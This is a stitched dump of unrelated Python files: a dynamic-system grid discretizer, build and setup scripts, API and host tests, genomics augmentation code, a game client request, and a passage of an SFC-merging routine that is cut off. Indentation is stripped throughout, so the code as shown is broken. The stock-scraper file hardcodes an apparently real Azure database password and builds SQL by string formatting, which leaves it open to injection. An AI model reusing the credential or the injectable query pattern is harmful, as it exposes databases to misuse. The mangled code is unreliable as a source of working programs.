# -*- coding: utf-8 -*-
"""
Created on Wed Jul 12 10:02:12 2017
@author: alxgr
"""
import numpy as np
'''
################################################################################
'''
class GridDynamicSystem:
""" Create a discrete gird state-action space for a 2D continous dynamic system, one continuous input u """
############################
def __init__(self, sys , xgriddim = ( 101 , 101 ), ugriddim = ( 11 , 1 ) , dt = 0.05 ):
self.sys = sys # Dynamic system class
# Discretization Parameters
# Simple 1-DoF
self.dt = dt # time discretization
# Grid size
self.xgriddim = xgriddim
self.ugriddim = ugriddim
# Options
self.uselookuptable = True
self.compute()
##############################
def compute(self):
""" """
self.discretizespace()
self.discretizeactions()
print('\nDiscretization:\n---------------------------------')
print('State space dimensions:', self.sys.n , ' Input space dimension:', self.sys.m )
print('Number of nodes:', self.nodes_n , ' Number of actions:', self.actions_n )
print('Number of node-action pairs:', self.nodes_n * self.actions_n )
self.generate_nodes()
self.generate_actions()
if self.uselookuptable:
self.compute_lookuptable()
#############################
def discretizespace(self):
""" Grid the state space """
self.xd = []
self.nodes_n = 1
# n-D grid
self.x_grid2node = np.zeros( self.xgriddim , dtype = int ) # grid of corresponding index
# linespace for each x-axis and total number of nodes
for i in range(self.sys.n):
self.xd.append( np.linspace( self.sys.x_lb[i] , self.sys.x_ub[i] , self.xgriddim[i] ) )
self.nodes_n = self.nodes_n * self.xgriddim[i]
# 1-D List of nodes
self.nodes_state = np.zeros(( self.nodes_n , self.sys.n ), dtype = float ) # Number of nodes x state dimensions
self.nodes_index = np.zeros(( self.nodes_n , self.sys.n ), dtype = int ) # Number of nodes x state dimensions
#############################
def discretizeactions(self):
""" Grid the action space """
self.ud = []
self.actions_n = 1
# linespace for each u-axis and total number of actions
for i in range(self.sys.m):
self.ud.append( np.linspace( self.sys.u_lb[i] , self.sys.u_ub[i] , self.ugriddim[i] ) )
self.actions_n = self.actions_n * self.ugriddim[i]
# 1-D List of actions
self.actions_input = np.zeros(( self.actions_n , self.sys.m ), dtype = float ) # Number of actions x inputs dimensions
self.actions_index = np.zeros(( self.actions_n , self.sys.m ), dtype = int ) # Number of actions x inputs dimensions
##############################
def generate_nodes(self):
""" Compute 1-D list of nodes """
# For all state nodes
node = 0
if self.sys.n == 2 :
for i in range(self.xgriddim[0]):
for j in range(self.xgriddim[1]):
# State
x = np.array([ self.xd[0][i] , self.xd[1][j] ])
# State and grid index based on node #
self.nodes_state[node,:] = x
self.nodes_index[node,:] = np.array([i,j])
# Node # based on index ij
self.x_grid2node[i,j] = node
# Increment node number
node = node + 1
elif self.sys.n == 3:
for i in range(self.xgriddim[0]):
for j in range(self.xgriddim[1]):
for k in range(self.xgriddim[2]):
# State
x = np.array([ self.xd[0][i] , self.xd[1][j] , self.xd[2][k] ])
# State and grid index based on node #
self.nodes_state[node,:] = x
self.nodes_index[node,:] = np.array([i,j,k])
# Node # based on index ijk
self.x_grid2node[i,j,k] = node
# Increment node number
node = node + 1
else:
raise NotImplementedError
##############################
def generate_actions(self):
""" Compute 1-D list of actions """
# For all state nodes
action = 0
# Single input
if self.sys.m == 1 :
for k in range(self.ugriddim[0]):
u = np.array([ self.ud[0][k] ])
# State and grid index based on node #
self.actions_input[action,:] = u
self.actions_index[action,:] = k
# Increment node number
action = action + 1
elif self.sys.m == 2 :
for k in range(self.ugriddim[0]):
for l in range(self.ugriddim[1]):
u = np.array([ self.ud[0][k] , self.ud[1][l] ])
# State and grid index based on node #
self.actions_input[action,:] = u
self.actions_index[action,:] = np.array([k,l])
# Increment node number
action = action + 1
else:
raise NotImplementedError
##############################
def compute_lookuptable(self):
""" Compute lookup table for faster evaluation """
if self.uselookuptable:
# Evaluation lookup tables
self.action_isok = np.zeros( ( self.nodes_n , self.actions_n ) , dtype = bool )
self.x_next = np.zeros( ( self.nodes_n , self.actions_n , self.sys.n ) , dtype = float ) # lookup table for dynamic
# For all state nodes
for node in range( self.nodes_n ):
x = self.nodes_state[ node , : ]
# For all control actions
for action in range( self.actions_n ):
u = self.actions_input[ action , : ]
# Compute the next state with a forward-Euler step: x_next = x + f(x,u) * dt
x_next = self.sys.f( x , u ) * self.dt + x
# Check that the next state and the input are valid
x_ok = self.sys.isavalidstate(x_next)
u_ok = self.sys.isavalidinput(x,u)
self.x_next[ node, action, : ] = x_next
self.action_isok[ node, action] = ( u_ok & x_ok )
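# --- Illustrative usage sketch (not part of the original file) ----------------
# A minimal sketch of how GridDynamicSystem is typically queried, assuming `sys`
# is a continuous dynamic system object exposing n, m, x_lb, x_ub, u_lb, u_ub
# and f(x, u) as used above:
#
#   grid = GridDynamicSystem( sys , xgriddim = (51, 51) , ugriddim = (11, 1) )
#   node = grid.x_grid2node[10, 20]          # node index for grid coordinates (i, j)
#   x    = grid.nodes_state[node, :]         # continuous state of that node
#   u    = grid.actions_input[0, :]          # first discretized input
#   if grid.uselookuptable:
#       x_next = grid.x_next[node, 0, :]     # precomputed forward-Euler successor
#       ok     = grid.action_isok[node, 0]   # state/input validity flag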
'''
################################################################################
'''
class GridDynamicSystem3D(GridDynamicSystem):
""" Create a discrete gird state-action space for 3D continous dynamic system, two continuous input u """
############################
def __init__(self, sys , dt = 0.05 , x_n = 21 , u_n = 11 ):
self.sys = sys # Dynamic system class
# Discretization Parameters
# Simple 1-DoF
self.dt = dt # time discretization
self.x0_n = x_n # x0 discretization
self.x1_n = x_n # x1 discretization
self.x2_n = x_n # x2 discretization
self.u0_n = u_n # u0 discretization
self.u1_n = u_n
# Options
self.uselookuptable = False # Too Big
self.compute()
#############################
def discretizespace(self):
""" Grid the state space """
# Grid
self.xgriddim = ( self.x0_n , self.x1_n , self.x2_n )
self.xd = [ None , None , None ]
self.xd[0] = np.linspace( self.sys.x_lb[0] , self.sys.x_ub[0] , self.x0_n )
self.xd[1] = np.linspace( self.sys.x_lb[1] , self.sys.x_ub[1] , self.x1_n )
self.xd[2] = np.linspace( self.sys.x_lb[2] , self.sys.x_ub[2] , self.x2_n )
self.x_grid2node = np.zeros( ( self.x0_n , self.x1_n , self.x2_n ) , dtype = int ) # grid of corresponding index
# 1-D List of nodes
self.nodes_n = self.x0_n * self.x1_n * self.x2_n
self.nodes_state = np.zeros(( self.nodes_n , self.sys.n ), dtype = float ) # Number of nodes x state dimensions
self.nodes_index = np.zeros(( self.nodes_n , self.sys.n ), dtype = int ) # Number of nodes x state dimensions
#############################
def discretizeactions(self):
""" Grid the action space """
# Grid
self.ugriddim = ( self.u0_n , self.u1_n )
self.ud = [ None , None ]
self.ud[0] = np.linspace( self.sys.u_lb[0] , self.sys.u_ub[0] , self.u0_n )
self.ud[1] = np.linspace( self.sys.u_lb[1] , self.sys.u_ub[1] , self.u1_n )
# 1-D List of actions
self.actions_n = self.u0_n * self.u1_n
self.actions_input = np.zeros(( self.actions_n , self.sys.m ), dtype = float ) # Number of actions x inputs dimensions
self.actions_index = np.zeros(( self.actions_n , self.sys.m ), dtype = int ) # Number of actions x inputs dimensions
##############################
def generate_nodes(self):
""" Compute 1-D list of nodes """
# For all state nodes
node = 0
for i in range(self.x0_n):
for j in range(self.x1_n):
for k in range(self.x2_n):
# State
x = np.array([ self.xd[0][i] , self.xd[1][j] , self.xd[2][k] ])
# State and grid index based on node #
self.nodes_state[node,:] = x
self.nodes_index[node,:] = np.array([i,j,k])
# Node # based on index ijk
self.x_grid2node[i,j,k] = node
# Increment node number
node = node + 1
##############################
def generate_actions(self):
""" Compute 1-D list of actions """
# For all state nodes
action = 0
for l in range(self.u0_n):
for m in range(self.u1_n):
u = np.array([ self.ud[0][l] , self.ud[1][m] ])
# State and grid index based on node #
self.actions_input[action,:] = u
self.actions_index[action,:] = np.array([l,m])
# Increment node number
action = action + 1
'''
#################################################################
################## Main ########
#################################################################
'''
if __name__ == "__main__":
""" MAIN TEST """
from pyro.dynamic import Manipulator as M
# Define dynamic system
R = M.OneLinkManipulator()
dR = GridDynamicSystem( R )
|
from setuptools import setup, find_packages
setup(
name='mlem',
version='0.0.1',
packages=["mlem"],
install_requires=['numpy', 'Pillow', 'scipy'],
tests_require=['pytest'],
license='MIT'
)
|
'''
@author: Dallas Fraser
@date: 2019-03-13
@organization: MLSB API
@summary: Tests all the advanced player lookup APIs
'''
from datetime import date
from api.helper import loads
from api.routes import Routes
from base64 import b64encode
from api.test.advanced.mock_league import MockLeague
from api.test.BaseTest import TestSetup, ADMIN, PASSWORD
headers = {
'Authorization': 'Basic %s' % b64encode(bytes(ADMIN + ':' +
PASSWORD, "utf-8")
).decode("ascii")
}
VALID_YEAR = date.today().year
INVALID_YEAR = 100
class PlayerLookupTest(TestSetup):
def testPlayerName(self):
"""Test player name parameter"""
mocker = MockLeague(self)
# non existent player name
expect = []
name = "NAME DOES NOT EXISTS FOR REASONS"
rv = self.app.post(Routes['vplayerLookup'], data={'player_name': name})
self.output(expect)
self.output(loads(rv.data))
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": invalid player name")
# a valid player
expect = [mocker.get_players()[0]]
name = mocker.get_players()[0]['player_name']
rv = self.app.post(Routes['vplayerLookup'], data={'player_name': name})
self.output(expect)
self.output(loads(rv.data))
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": valid player name")
def testEmail(self):
"""Test email parameter"""
mocker = MockLeague(self)
# non existent player name
expect = []
email = "EMAILDOESNOTEXISTSFOR@reasons.com"
rv = self.app.post(Routes['vplayerLookup'], data={'email': email})
self.output(expect)
self.output(loads(rv.data))
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": invalid email")
# a valid email
expect = [mocker.get_players()[0]]
email = mocker.get_player_email(0)
rv = self.app.post(Routes['vplayerLookup'], data={'email': email})
self.output(expect)
self.output(loads(rv.data))
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": valid email")
def testActive(self):
"""Test active parameter"""
mocker = MockLeague(self)
# all players
player = mocker.get_players()[0]
expect = [player]
active = 0
name = player['player_name']
rv = self.app.post(Routes['vplayerLookup'], data={'active': active,
'player_name': name})
self.output(expect)
self.output(loads(rv.data))
self.assertTrue(len(loads(rv.data)) > 0,
Routes['vplayerLookup'] + ": active & non-active")
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": active & non-active")
# now make the player non-active
self.deactivate_player(player)
# only active players
active = 1
rv = self.app.post(Routes['vplayerLookup'], data={'active': active,
'player_name': name})
expect = []
self.output(expect)
self.output(loads(rv.data))
activity = [_player['active'] for _player in loads(rv.data)]
error_message = Routes['vplayerLookup'] + ":non-active player returned"
self.assertTrue(False not in activity, error_message)
self.assertEqual(expect, loads(rv.data), error_message)
|
# -*- coding: utf-8 -*-
from . import abono
from . import cliente
from . import empleado
from . import instalacion
from . import material
from . import pago
from . import reserva
from . import tarjeta
from . import efectivo
|
from .countries import COUNTRIES
from .regions import REGIONS
from .wmi import WMI
|
#
# to create executables for the filter and integrator
# type the following at the command line in this directory:
# python setup_py2exe.py py2exe
# executables will appear in the dist subdirectory
"""
Important note:
seeing errors in build with python setup.py py2exe?
move whole directory to a non-networked drive!
Seeing errors about vcvarsall.bat?
SET VS90COMNTOOLS=%VS100COMNTOOLS%
"""
##
from distutils.core import setup
# from setuptools import setup
import py2exe
import sys
import os
import shutil
import numpy
import numpy.oldnumeric
import scipy
from scipy import ndimage
import matplotlib
matplotlib.use('WXAgg')
from matplotlib.widgets import Cursor
from matplotlib import pyplot
from matplotlib import pylab
import h5py
import Image
#import sqlalchemy
import wx
from wx.lib.splitter import MultiSplitterWindow
from wx.tools.Editra.src.eclib import pstatbar
import ctypes
import ctypes.util
from numpy import sort
#import scipy.lib.six
import scipy.io.netcdf
from scipy.io.netcdf import netcdf_file
#from scipy.sparse.csgraph import _validation
#from scipy.special import _ufuncs, _ufuncs_cxx
import scipy.constants
from background import background
loadlib = ctypes.windll.LoadLibrary
x = xrange(10)
# larch library bits...
#import larch
#from larch.larchlib import get_dll
#cllib = get_dll('cldata')
#matplotlib, wxmplot
matplotlib.use('WXAgg')
mpl_data_files = matplotlib.get_py2exe_datafiles()
# import wxmplot
## epics
#try:
# import epics
# ca = epics.ca.initialize_libca()
#except ImportError:
# pass
extra_files = ['inno_setup.iss', '../COPYING', '../README.txt',
'../bin/GSEMap.ico', '../bin/larch.ico', '../bin/ptable.ico']
scipy_dlls = ['lib/site-packages/scipy/optimize/minpack2.pyd',
'lib/site-packages/scipy/interpolate/dfitpack.pyd',
'lib/site-packages/scipy/integrate/_quadpack.pyd',
'lib/site-packages/numpy/fft/fftpack_lite.pyd']
dlldir = os.path.join(sys.prefix, 'DLLs')
for n in os.listdir(dlldir):
extra_files.append(os.path.join(dlldir, n))
for n in scipy_dlls:
extra_files.append(os.path.join(sys.prefix, n))
style_xml = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.0.0.0"
processorArchitecture="x86"
name="XrayLarch"
type="win32"
/>
<description>XrayLarch</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false">
</requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.VC90.CRT"
version="9.0.21022.8"
processorArchitecture="x86"
publicKeyToken="1fc8b3b9a1e18e3b">
</assemblyIdentity>
</dependentAssembly>
</dependency>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="X86"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
"""
windows_apps = [{'script': 'run_integrator.py',
# 'icon_resources': [(0, '../bin/larch.ico')],
'other_resources': [(24, 1, style_xml)],
},
{'script': 'run_filter.py',
# 'icon_resources': [(0, '../bin/GSEMap.ico')],
'other_resources': [(24, 1, style_xml)],
},
]
py2exe_opts = {'optimize':1,
'bundle_files':2,
'includes': ['ConfigParser', 'Image', 'ctypes',
'fpformat',
'h5py', 'h5py._objects', 'h5py._proxy',
'h5py.defs', 'h5py.utils',
'matplotlib',
'matplotlib.widgets',
#'matplotlib.backends.backend_tkagg',
#'matplotlib.backends.backend_wxagg',
'numpy', 'numpy.oldnumeric',
'scipy',
'scipy.lib', 'scipy.ndimage', 'scipy.stats',
#'scipy.lib.six',
'scipy.constants',
'scipy.fftpack',
'scipy.sparse',
# 'scipy.sparse.compressed',
# 'scipy.sparse.sparsetools',
'scipy.sparse.csgraph',
#'scipy.sparse.csgraph._validation',
#'scipy.special._ufuncs_cxx',
'scipy.io.matlab.mio5_utils',
'scipy.io.matlab.streams',
'scipy.io.netcdf',
'scipy.optimize',
'scipy.signal',
'wx', 'wx._core',
#'wx.exit',
'wx.richtext',
'wx.lib', 'wx.lib.agw',
'wx.lib.agw.flatnotebook',
'wx.lib.colourselect', 'wx.lib.masked',
'wx.lib.mixins', 'wx.lib.mixins.inspection',
'wx.lib.agw.pycollapsiblepane',
'wx.lib.splitter',
'wx.tools.Editra', 'wx.tools.Editra.src.eclib',
'wx.lib.newevent', 'wx.py',
'wxversion', 'xdrlib', 'xml.etree',
'xml.etree.cElementTree'],
'packages': ['h5py', 'scipy.optimize', 'scipy.signal', 'scipy.io',
'numpy.random', 'xml.etree', 'xml.etree.cElementTree'],
'excludes': ['Tkinter', '_tkinter', 'Tkconstants', 'tcl',
'_imagingtk', 'PIL._imagingtk', 'ImageTk',
'PIL.ImageTk', 'FixTk', '_gtkagg', '_tkagg',
'matplotlib.tests', 'qt', 'PyQt4Gui', 'IPython',
'pywin', 'pywin.dialogs', 'pywin.dialogs.list'],
'dll_excludes': [# 'w9xpopen.exe',
# 'libgdk-win32-2.0-0.dll',
# 'libgobject-2.0-0.dll', 'libzmq.dll'
]
}
setup(name = "GSE_CTR",
windows = windows_apps,
options = {'py2exe': py2exe_opts},
data_files = mpl_data_files)
for fname in extra_files:
path, name = os.path.split(fname)
print fname, name
try:
shutil.copy(fname, os.path.join('dist', name))
except:
pass
if __name__ == '__main__':
print 'usage: python py2exe_build.py py2exe'
|
from scanpy import read_h5ad
from ._io import read_10x_vdj, read_tracer, read_airr, read_bracer
from ._convert_anndata import from_ir_objs, to_ir_objs
from ..util import deprecated
from ._datastructures import IrCell, IrChain
@deprecated(
"Due to added BCR support, this function has been renamed "
"to `from_ir_objs. The old version will be removed in a future release. "
)
def from_tcr_objs(*args, **kwargs):
return from_ir_objs(*args, **kwargs)
@deprecated(
"Due to added BCR support, this function has been renamed "
"to `IrCell. The old version will be removed in a future release. "
)
def TcrCell(*args, **kwargs):
return IrCell(*args, **kwargs)
@deprecated(
"Due to added BCR support, this function has been renamed "
"to `IrChain. The old version will be removed in a future release. "
)
def TcrChain(*args, **kwargs):
return IrChain(*args, **kwargs)
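# --- Illustrative note (not part of the original file) ------------------------
# Each renamed wrapper simply forwards its arguments to the new API, e.g.
# TcrCell(...) returns IrCell(...) and from_tcr_objs(...) returns
# from_ir_objs(...); the `deprecated` decorator from ..util is assumed here to
# only emit a deprecation message without changing the return value.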
|
import kol.Error as Error
from kol.database import ItemDatabase
from kol.manager import PatternManager
from kol.request.GenericRequest import GenericRequest
class WokRequest(GenericRequest):
def __init__(self, session, itemid1, numMake=1):
super(WokRequest, self).__init__(session)
self.url = session.serverURL + "guild.php"
self.requestData['pwd'] = session.pwd
self.requestData['action'] = 'wokcook'
self.requestData['qty'] = numMake
self.requestData['whichitem'] = itemid1
def parseResponse(self):
noWokAccess = PatternManager.getOrCompilePattern('noWokAccess')
itemsDontMakeFoodPattern = PatternManager.getOrCompilePattern('dontHaveItemsForWok')
dontHaveSkillPattern = PatternManager.getOrCompilePattern('dontHaveSkillForWok')
dontHaveAdventuresPattern = PatternManager.getOrCompilePattern('dontHaveAdventuresForWok')
# Check for errors.
if noWokAccess.search(self.responseText):
raise Error.Error("Unable to use the Wok of Ages. I can't get to the Wok!", Error.RECIPE_NOT_FOUND)
elif dontHaveSkillPattern.search(self.responseText):
raise Error.Error("Unable to use the Wok of Ages. I am not skilled enough.", Error.SKILL_NOT_FOUND)
elif itemsDontMakeFoodPattern.search(self.responseText):
raise Error.Error("Unable to use the Wok of Ages. Invalid ingredients.", Error.ITEM_NOT_FOUND)
elif dontHaveAdventuresPattern.search(self.responseText):
raise Error.Error("Unable to use the Wok of Agles. I don't have enough adventures.", Error.NOT_ENOUGH_ADVENTURES)
# Find the items attached to the message.
singleItemPattern = PatternManager.getOrCompilePattern('acquireSingleItem')
match = singleItemPattern.search(self.responseText)
if match:
descId = int(match.group(1))
item = ItemDatabase.getOrDiscoverItemFromDescId(descId, self.session)
item["quantity"] = 1
else:
multiItemPattern = PatternManager.getOrCompilePattern('acquireMultipleItems')
match = multiItemPattern.search(self.responseText)
if match:
descId = int(match.group(1))
item = ItemDatabase.getOrDiscoverItemFromDescId(descId, self.session)
quantity = int(match.group(2).replace(',', ''))
item["quantity"] = quantity
else:
raise Error.Error("Unknown error.", Error.REQUEST_GENERIC)
self.responseData["wok"] = item
|
from bs4 import BeautifulSoup
import requests
import pandas as pd
from datetime import date, datetime
from sqlalchemy import create_engine
from psycopg2.errors import UniqueViolation
AZURE_IP_ADDRESS = 'stocks-db.postgres.database.azure.com'
AZURE_PORT = '5432'
AZURE_USERNAME = 'mattooren@stocks-db'
AZURE_PASSWORD = 'YehNYA97vZGueESf'
AZURE_TABLE = 'postgres'
def parse_ASN_koersen_table(table):
table_rows = table.find_all('tr')
res = []
for tr in table_rows:
td = tr.find_all('td')
row = [tr.text.strip() for tr in td if tr.text.strip()]
if row:
res.append(row)
else:
th = tr.find_all('th')
columns = [tr.text.strip() for tr in th if tr.text.strip()]
return pd.DataFrame(res, columns=columns)
def load_koersen_from_ASN(**kwargs):
result = requests.get("https://www.asnbank.nl/zakelijk/zakelijke-beleggingsrekening/koersen.html")
soup = BeautifulSoup(result.content, 'html.parser')
table = soup.find(lambda tag: tag.name == 'table' and tag.has_attr('id') and tag['id'] == "table410710")
df = parse_ASN_koersen_table(table)
load_koersen_into_database(df)
return df
def load_koersen_into_database(df_koersen):
con = connect_to_database()
add_funds(con, df_koersen.iloc[:,0].array)
add_share_prices(con, df_koersen)
def add_funds(con, array_koersen):
for koers in array_koersen:
result = con.execute("SELECT * FROM fund WHERE fund_id = '{}'".format(koers))
if result.rowcount == 0:
con.execute("INSERT INTO fund(fund_id) VALUES ('{}') ".format(koers))
def add_share_prices(con, df_koersen):
data_koersen = df_koersen.set_index(df_koersen.columns[0]).stack().reset_index()
data_koersen.columns = ['fund_id', 'datetime', 'share_price']
data_koersen['datetime'] = pd.to_datetime(data_koersen['datetime'], format='%d-%m-%Y')
data_koersen['share_price'] = data_koersen['share_price'].apply(lambda x: x.replace(',' , '.')).astype(float)
data_koersen['creation_time'] = datetime.now()
current_id = con.execute("SELECT MAX(share_price_id) from share_price").first()[0]
current_id = 0 if current_id == None else current_id + 1
for index, row in data_koersen.iterrows():
query = "INSERT INTO share_price(share_price_id, fund_id, datetime, share_price, creation_time) VALUES('{}', '{}', '{}', '{}', '{}')".format(
current_id,
row['fund_id'],
row['datetime'],
row['share_price'],
row['creation_time']
)
result = con.execute("SELECT * FROM share_price WHERE fund_id = '{}' AND datetime = '{}'".format(row['fund_id'], row['datetime']))
if result.rowcount == 0:
con.execute(query)
current_id += 1
def connect_to_database():
url = 'postgresql://{}:{}@{}:{}/{}'.format(AZURE_USERNAME, AZURE_PASSWORD, AZURE_IP_ADDRESS, AZURE_PORT, AZURE_TABLE)
engine = create_engine(url)
return engine
if __name__ == '__main__':
ds = 1
print(load_koersen_from_ASN())
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
import pdb
import tensorflow as tf
from basenji import ops
def shift_sequence(seq, shift_amount, pad_value=0.25):
"""Shift a sequence left or right by shift_amount.
Args:
seq: a [batch_size, sequence_length, sequence_depth] sequence to shift
shift_amount: the signed amount to shift (tf.int32 or int)
pad_value: value to fill the padding (primitive or scalar tf.Tensor)
"""
if seq.shape.ndims != 3:
raise ValueError('input sequence should be rank 3')
input_shape = seq.shape
pad = pad_value * tf.ones_like(seq[:, 0:tf.abs(shift_amount), :])
def _shift_right(_seq):
sliced_seq = _seq[:, :-shift_amount:, :]
return tf.concat([pad, sliced_seq], axis=1)
def _shift_left(_seq):
sliced_seq = _seq[:, -shift_amount:, :]
return tf.concat([sliced_seq, pad], axis=1)
output = tf.cond(
tf.greater(shift_amount, 0), lambda: _shift_right(seq),
lambda: _shift_left(seq))
output.set_shape(input_shape)
return output
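# --- Illustrative usage sketch (not part of the original file) ----------------
# A minimal sketch of shift_sequence, assuming TensorFlow 1.x graph mode with a
# tf.Session, as used elsewhere in this module:
#
#   seq = tf.zeros([2, 8, 4]) + 1.0                      # [batch, length, depth], all ones
#   shifted = shift_sequence(seq, shift_amount=2, pad_value=0.25)
#   # positions 0-1 along the length axis become 0.25; positions 2-7 keep the
#   # original values from positions 0-5 (shifted right by 2)
#   with tf.Session() as sess:
#       print(sess.run(shifted)[0, :, 0])                # [0.25, 0.25, 1., 1., 1., 1., 1., 1.]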
def augment_deterministic_set(data_ops, augment_rc=False, augment_shifts=[0]):
"""
Args:
data_ops: dict with keys 'sequence', 'label', and 'na'.
augment_rc: Boolean
augment_shifts: List of ints.
Returns
data_ops_list:
"""
augment_pairs = []
for ashift in augment_shifts:
augment_pairs.append((False, ashift))
if augment_rc:
augment_pairs.append((True, ashift))
data_ops_list = []
for arc, ashift in augment_pairs:
data_ops_aug = augment_deterministic(data_ops, arc, ashift)
data_ops_list.append(data_ops_aug)
return data_ops_list
def augment_deterministic(data_ops, augment_rc=False, augment_shift=0):
"""Apply a deterministic augmentation, specified by the parameters.
Args:
data_ops: dict with keys 'sequence', 'label', and 'na'.
augment_rc: Boolean
augment_shift: Int
Returns
data_ops: augmented data, with all existing keys transformed
and 'reverse_preds' bool added.
"""
data_ops_aug = {}
for key in data_ops:
if key not in ['sequence']:
data_ops_aug[key] = data_ops[key]
if augment_shift == 0:
data_ops_aug['sequence'] = data_ops['sequence']
else:
shift_amount = tf.constant(augment_shift, shape=(), dtype=tf.int64)
data_ops_aug['sequence'] = shift_sequence(data_ops['sequence'], shift_amount)
if augment_rc:
data_ops_aug = augment_deterministic_rc(data_ops_aug)
else:
data_ops_aug['reverse_preds'] = tf.zeros((), dtype=tf.bool)
return data_ops_aug
def augment_deterministic_rc(data_ops):
"""Apply a deterministic reverse complement augmentation.
Args:
data_ops: dict with keys 'sequence', 'label', and 'na'.
Returns
data_ops_aug: augmented data ops
"""
data_ops_aug = ops.reverse_complement_transform(data_ops)
data_ops_aug['reverse_preds'] = tf.ones((), dtype=tf.bool)
return data_ops_aug
def augment_stochastic_rc(data_ops):
"""Apply a stochastic reverse complement augmentation.
Args:
data_ops: dict with keys 'sequence', 'label', and 'na'.
Returns
data_ops_aug: augmented data
"""
reverse_preds = tf.random_uniform(shape=[]) > 0.5
data_ops_aug = tf.cond(reverse_preds, lambda: ops.reverse_complement_transform(data_ops),
lambda: data_ops.copy())
data_ops_aug['reverse_preds'] = reverse_preds
return data_ops_aug
def augment_stochastic_shifts(seq, augment_shifts):
"""Apply a stochastic shift augmentation.
Args:
seq: input sequence of size [batch_size, length, depth]
augment_shifts: list of int offsets to sample from
Returns:
shifted and padded sequence of size [batch_size, length, depth]
"""
shift_index = tf.random_uniform(shape=[], minval=0,
maxval=len(augment_shifts), dtype=tf.int64)
shift_value = tf.gather(tf.constant(augment_shifts), shift_index)
seq = tf.cond(tf.not_equal(shift_value, 0),
lambda: shift_sequence(seq, shift_value),
lambda: seq)
return seq
def augment_stochastic(data_ops, augment_rc=False, augment_shifts=[]):
"""Apply stochastic augmentations,
Args:
data_ops: dict with keys 'sequence', 'label', and 'na'.
augment_rc: Boolean for whether to apply reverse complement augmentation.
augment_shifts: list of int offsets to sample shift augmentations.
Returns:
data_ops_aug: augmented data
"""
if augment_shifts:
data_ops['sequence'] = augment_stochastic_shifts(data_ops['sequence'],
augment_shifts)
if augment_rc:
data_ops = augment_stochastic_rc(data_ops)
else:
data_ops['reverse_preds'] = tf.zeros((), dtype=tf.bool)
return data_ops
|
# Write tests for the hosts here.
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
import pytest
# Basic sanity check - the hosts file should belong to root
def test_hosts_file(host):
f = host.file('/etc/hosts')
assert f.exists
assert f.user == 'root'
assert f.group == 'root'
# Basic sanity check - ntp must be installed
def test_ntp(host):
assert host.package('ntp').is_installed
@pytest.mark.parametrize("package_name", [("perfsonar-tools"),("perfsonar-core"),("perfsonar-common"),("perfsonar-oppd-bwctl"),("perfsonar-oppd-owamp"),("perfsonar-oppd-server"),("perfsonar-oppd-shared"),("perfsonar-testpoint"),("perfsonar-tools")])
def test_prerequisites(host,package_name):
package = host.package(package_name)
assert package.is_installed
# def test_migration(host):
# f = host.file('/usr/lib/perfsonar/scripts/ps-migrate-backup.sh')
# assert f.exists
|
#!/usr/bin/env python
""" P4SC library: libMerge.py
This file provides fundamental functions of merging SFCs
Author: XiangChen, 2018.3.23
"""
import os
import sys
import argparse
import commands
import time
import datetime
import math
import psutil
from lcsSrc.lcs import *
from tableCmpSrc.genTopoOrder import *
""" P4SC LCS algorithm, used to merge two SFCs
"""
def merge(l1,l2):
# Running key algorithm
lists = lcs(l1, l2)
if lists == [[]]:
print "The lcs list is empty, so simply merge the two orders.\n"
return l1+l2
else:
print "Found the lcs order set."
"""Choose the first order in the lcs order list based on value file"""
lcsOrder = lists[0]
"""Merge the two topologic orders"""
# Here we create a set named "First" to record the previous variables
# in the set of insert list(insl), i.e.the variables before the first
# common LCS variable.
#
# To handle the First set, we insert it before the place where the
# first lcs variable occurs.
basel, insl = [], []
if len(l1) >= len(l2):
basel, insl = l1, l2
else:
basel, insl = l2, l1
# the first lcs variable
first_lcs_val = lcsOrder[0]
# the index of first lcs variable in base list
first_lcs_val_idx_in_basel = 0
for base_idx in range(len(basel)):
if basel[base_idx] == first_lcs_val:
first_lcs_val_idx_in_basel = base_idx
break
# initial mergedl: merged list
mergedl = basel
first_lcs_val_idx_in_mergedl = first_lcs_val_idx_in_basel
# Here we start to divide the insert list into two parts:
# the first set and the other parts of insert list.
### 1.calculate the first set and the corresponding index
first_set = []
first_lcs_val_idx_in_insl = 0
for insl_idx in range(len(insl)):
if insl[insl_idx] == first_lcs_val:
first_lcs_val_idx_in_insl = insl_idx
break
else:
first_set.append(insl[insl_idx])
### 2.handle the first set
if first_set == []:
print "Warning: The first set is empty. Ignoring the handling of first set.", '\n'
pass
else:
# insert to the place before first lcs variable in merged list
insert_base = first_lcs_val_idx_in_mergedl
for insert_idx in range(len(first_set)):
insert_hdl = insert_base+insert_idx
mergedl.insert(insert_hdl, first_set[insert_idx])
# update the place index of the index of first lcs variable in merged list
first_lcs_val_idx_in_mergedl += len(first_set)
# current insl : [first_set] [first value of lcs order] [other elements]
# current mergedl: [first_set] [first value of lcs order] [other elements]
# Now we start to merge insl to mergedl based on lcs order sequence
### 3.handle the other parts of insert list
# the movp points to the first lcs val in merged list at beginning
# movp is used to traverse >> mergedl << and indicate current element
movp = first_lcs_val_idx_in_mergedl+1
# we decide that if current value is also the top value of mergedl,
